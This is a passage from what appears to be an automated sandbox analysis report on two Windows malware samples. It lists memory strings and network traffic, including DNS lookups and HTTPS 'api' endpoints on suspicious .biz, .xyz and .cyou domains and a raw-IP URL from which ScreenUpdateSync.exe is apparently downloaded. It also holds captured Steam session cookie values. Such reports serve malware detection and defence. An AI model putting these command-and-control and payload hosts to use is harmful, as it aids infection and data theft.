                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=2ea280fd0ecd38148ff05529; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 
05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type25665Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveTue, 17 Dec 2024 08:42:59 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: post-to-me.com
Source: global traffic | DNS traffic detected: DNS query: sordid-snaked.cyou
Source: global traffic | DNS traffic detected: DNS query: immureprech.biz
Source: global traffic | DNS traffic detected: DNS query: deafeninggeh.biz
Source: global traffic | DNS traffic detected: DNS query: effecterectz.xyz
Source: global traffic | DNS traffic detected: DNS query: diffuculttan.xyz
Source: global traffic | DNS traffic detected: DNS query: debonairnukk.xyz
Source: global traffic | DNS traffic detected: DNS query: wrathful-jammy.cyou
Source: global traffic | DNS traffic detected: DNS query: awake-weaves.cyou
Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: immureprech.biz
Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:27060
Source: hpEAJnNwCB.exe, 00000000.00000003.1362746169.0000000000BAC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.19/
Source: hpEAJnNwCB.exe, 00000000.00000003.1362746169.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.19/$0
Source: hpEAJnNwCB.exe, 00000000.00000003.1362746169.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000002.3745614627.0000000000B80000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000003.3613315762.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
Source: hpEAJnNwCB.exe, 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE
Source: hpEAJnNwCB.exe, 00000000.00000003.1362746169.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeWX
Source: hpEAJnNwCB.exe, 00000000.00000002.3745877120.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000003.1362746169.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000003.3613315762.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exel0
Source: hpEAJnNwCB.exe, 00000000.00000002.3745877120.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000003.1362746169.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000003.3613315762.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exey0
Source: 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.7.dr | String found in binary or memory: http://upx.sf.net
Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.steampowered.com/
Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://checkout.steampowered.com/
Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/
Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=engli
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                  Source: 91B1.tmp.exe, 00000003.00000003.1471777878.000000000097A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471854297.0000000000982000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/api
                  Source: 91B1.tmp.exe, 00000003.00000003.1471879039.000000000096A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471571879.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/api.
                  Source: 91B1.tmp.exe, 00000003.00000003.1471777878.000000000097A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471854297.0000000000982000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/apiV
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://diffuculttan.xyz/api
                  Source: 91B1.tmp.exe, 00000003.00000003.1471571879.0000000000953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.x
                  Source: 91B1.tmp.exe, 00000003.00000003.1471571879.0000000000949000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471777878.000000000097A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471854297.0000000000982000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/
                  Source: 91B1.tmp.exe, 00000003.00000003.1471777878.000000000097A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471854297.0000000000982000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/0g
                  Source: 91B1.tmp.exe, 00000003.00000003.1471777878.000000000097A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471854297.0000000000982000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/P
                  Source: 91B1.tmp.exe, 00000003.00000003.1471879039.000000000096A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471777878.000000000097A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471854297.0000000000982000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471571879.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/api
                  Source: 91B1.tmp.exe, 00000003.00000003.1471777878.000000000097A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471854297.0000000000982000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/apim
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                  Source: 91B1.tmp.exe, 00000003.00000003.1471571879.0000000000949000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/api
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                  Source: hpEAJnNwCB.exe, 00000000.00000003.3613575394.0000000000B80000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000002.3745614627.0000000000B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
                  Source: hpEAJnNwCB.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
                  Source: hpEAJnNwCB.exe, 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
                  Source: hpEAJnNwCB.exe, 00000000.00000003.3613575394.0000000000B80000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000002.3745614627.0000000000B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE6
                  Source: hpEAJnNwCB.exe, 00000000.00000003.3613575394.0000000000B80000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000002.3745614627.0000000000B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE~
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/h.
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765611997243319008
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900ffuculttan.xyz
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shopr
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.10:49709 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 45.77.249.79:443 -> 192.168.2.10:49736 version: TLS 1.2
